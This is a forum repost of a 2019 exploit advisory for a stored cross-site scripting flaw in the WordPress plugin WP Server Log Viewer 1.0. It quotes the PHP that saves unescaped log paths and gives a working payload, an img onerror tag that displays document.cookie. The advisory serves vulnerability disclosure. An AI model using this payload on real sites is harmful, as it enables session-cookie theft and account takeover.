WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月4日2年前

# Exploit Title: WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting
# Date: 2019-09-10
# Exploit Author: strider
# Software Link: https://github.com/anttiviljami/wp-server-log-viewer
# Version: 1.0
# Tested on: Debian 10 Buster x64 / Kali Linux
# CVE : None

====================================[Description]====================================
This plugin allows you to add logfiles via wp-admin. The problem here is that the file paths are stored unfiltered/unescaped. This gives the possibility of a persistent XSS attack.


====================================[Codepart]====================================

if( isset( $_GET['action'] ) && 'new' === $_GET['action'] && isset( $_GET['logpath'] ) ) {
      // new log was added
      $logs = get_option( 'server_logs' );
      if( is_null( $logs ) ) {
        $logs = [];
      }

      $log = trim( $_GET['logpath'] ); //only trimmed string no escaping
      $logs[] = $log; //here the log will be added without security checks
      $logs = array_values( $logs );

      $index = array_search( $log, $logs );

      update_option( 'server_logs', $logs );

      wp_safe_redirect( admin_url('tools.php?page=wp-server-log-viewer&log=' . $index) );
    }



====================================[Proof of Concept]====================================
Add new log file to the plugin.
paste this exploit into the form and submit it.

<img src=# onerror=alert(document.cookie);>log.txt

It tries to render an image and triggers the onerror event and prints the cookie. in the tab you see the log.txt

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索